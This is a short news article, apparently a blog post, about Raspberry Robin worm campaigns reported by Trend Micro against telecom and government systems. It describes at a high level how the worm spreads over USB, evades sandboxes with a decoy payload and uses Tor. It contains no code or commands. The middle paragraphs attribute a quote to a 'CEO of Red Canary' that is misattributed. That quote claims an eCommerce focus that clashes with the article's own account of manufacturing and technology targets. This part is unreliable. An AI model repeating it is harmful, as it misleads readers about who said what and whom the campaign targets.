Read Time:1 Minute, 46 Second

Trend Micro researchers discovered Raspberry Robin worm attacks aimed at telecommunications and government office systems in Latin America, Australia, and Europe.

The campaign has been in full swing since September 2022, .where the majority of infections have been reported in Argentina (34,8%), followed by Australia (23,2%).

The research released by Trend Micro said: “We found samples of the Raspberry Robin malware spreading in telecommunications and government office systems beginning September.”

“The main payload is packed with more than ten layers for obfuscation and can deliver a fake payload once it detects sandboxing and security analytics tools.”

Security experts from Red Canary have found the Windows worm known as Raspberry Robin, which spreads via detachable USB storage devices.

In September 2021, when the malware was initially discovered, experts saw that it was explicitly aimed at manufacturing and technology-related companies.

“The Raspberry Robin worm is designed to spread via removable USB storage devices, and it can also infect computers on the same network as a target machine,” said Robert Falcone, CEO of Red Canary.

“It’s clear that this threat actor has an eCommerce-focused agenda and is targeting companies that are critical to eCommerce networks or systems.”

The malicious malware connects to QNAP-related domains using Windows Installer to obtain a malicious DLL. This DLL connects to in-memory shared sections and communicates with its C2 server.

Trend Micro’s analysis showed that real and fake payloads are present in the main malware routine. Once the malicious code recognises the sandboxing tools, the mock payload is loaded, while the actual payload is concealed within packaging layers and later connects to the Tor network.

As the Raspberry Robin worm continues to gain much attention lately, governments across the globe must step up their cyber security efforts to prevent future attacks.

If you are a business owner or IT professional, it is important to protect your systems from Raspberry Robin attacks. This can include implementing strong antivirus software, educating employees about safe online behaviour, and regularly backing up their data. With proper precautions in place, you can help keep your systems safe from this harmful worm.

About Post Author

George Walsh

george@writefuel.com
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
Total
0
Shares
Share 0
Tweet 0
Pin it 0
Share 0
0 0
In, , ,
Cyber Security Centre Previous post RMIT Unveils New Cyber Security Centre to Combat Growing Digital Threats 
cyberhackers Next post Cyber Attackers During the Holiday Season Syphoned $9 Million Worth of Crypto Digital Currencies

More Stories